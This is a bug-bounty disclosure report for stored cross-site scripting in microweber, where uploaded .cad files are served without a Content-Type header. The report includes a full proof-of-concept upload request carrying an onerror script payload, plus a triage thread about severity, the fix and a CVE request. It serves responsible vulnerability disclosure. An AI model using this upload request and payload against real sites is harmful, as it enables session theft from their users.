Cross-site scripting - Stored via upload ".cad" file in microweber/microweber

Valid

Reported on

Apr 27th 2022


Description

When user upload file with .cad extension in white-list, server will stored .cad file at userfiles/media/default/, so we can direct access. Becase when access this file, server not reponse with Content-type header, so this file can execute javascript code as Content-type: text/html.

Proof of Concept

POST /microweber/plupload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------160328176018575625273778825362
Content-Length: 615
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/microweber/admin/content/0/edit
Cookie: laravel_session=VtYsoItyj8nMr4HL6c9jgGhCckyCIvM0KefRFBVP; csrf-token-data=%7B%22value%22%3A%22g3SBhsqNBbpRl3ondmilLAqrPEssVIV9GQCfWH7k%22%2C%22expiry%22%3A1651077488795%7D; lang=en_US; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CZoRHz4Lp6Dw1kGoNmNjw8Bl9OnQxW9tsICXbPm45GY8PWB1MSkbLXzmWI5cV%7C%242y%2410%242mEkAOazLSPOHDj8x7C8ee06lkvn6Shka.Hdp6wt2g4k.j1maqtBS; back_to_admin=http%3A//127.0.0.1/microweber/admin/content/0/edit; mw-back-to-live-edit=true; show-sidebar-layouts=0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------160328176018575625273778825362
Content-Disposition: form-data; name="name"

xss.cad
-----------------------------160328176018575625273778825362
Content-Disposition: form-data; name="chunk"

0
-----------------------------160328176018575625273778825362
Content-Disposition: form-data; name="chunks"

1
-----------------------------160328176018575625273778825362
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<img src=x onerror="alert(window.origin)"/>
-----------------------------160328176018575625273778825362--

PoC Image

Upload .cad file
image

Server do not reponse with Content-type header
image

Access .cad file and XSS image

Impact

This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...

We are processing your report and will contact the microweber team within 24 hours. a month ago
Peter Ivanov modified the Severity from Critical to Low a month ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability a month ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov confirmed that a fix has been merged on 89c8f5 a month ago
Peter Ivanov has been awarded the fix bounty
Files.php#L1157 has been validated
Nhien.IT
a month ago

Researcher


Hi @maintainer,

Why this vulnerability was reduced to low level?

Nhien.IT
22 days ago

Researcher


Hi @admin @maintainer,

Can I get CVE for this report?

to join this conversation